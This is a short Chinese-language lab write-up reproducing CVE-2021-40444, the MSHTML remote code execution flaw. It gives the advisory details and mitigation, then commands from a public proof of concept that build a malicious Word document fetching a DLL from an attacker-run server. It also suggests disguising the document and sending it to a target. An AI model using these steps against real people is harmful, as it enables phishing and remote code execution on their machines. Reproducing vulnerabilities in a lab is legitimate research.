CVE-2021-40444漏洞复现详细

2021年9月8日，微软官方发布了MSHTML组件的风险通告（漏洞编号：CVE-2021-40444），未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 

1、漏洞详情：

Microsoft MSHTML远程代码执行漏洞

CVE-2021-40444

严重级别：严重   CVSS：8.8

被利用级别：检测到利用

危害：未经身份验证的攻击者可以利用该漏洞在目标系统上执行代码。

在野利用：微软表示已经发现攻击者利用此漏洞。在Office文档中添加恶意ActiveX控件，以此来诱导目标用户打开恶意文档。

修复：

截止2021年09月13号，微软暂未更新补丁，但提供了临时缓解措施：在 Internet Explorer 中禁用所有 ActiveX 控件的安装。

影响版本：

包括Windows 7/8/8.1/10

Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本，覆盖面比较广泛，但是主要用于office钓鱼，谨慎打开陌生文档

2、复现：

下载POC代码，到Ubuntu测试服务器上：

https://github.com/lockedbyte/CVE-2021-40444

(关闭防火墙，否则无法回连，ubuntu关闭防火墙    ufw disable)

运行脚本，先安装lcab

Sudo apt install lcab

查看ubuntu的ip地址，等下反连回来

执行命令生成恶意word文档

python3 exploit.py generate test/calc.dll http://ubuntu

生成后保存在CVE-2021-40444/out/document.docx

 启动exploit，开始侦听请求：

sudo python3 exploit.py host 80

如果启动失败可能是端口被占用，netstat查看一下80，把占用的进程kill结束一下

 

将恶意文档稍加渲染，发给对方

对方点击document.docx成功执行，弹出计算器

稍微分析一下，还是比较菜，不太懂，只会做个脚本小子

将ubuntu的监听关闭掉，再打开Windows机器的document.docx

会发现在Windows打开恶意文档时会显示正在发起请求，里面的POC没有详细分析待分析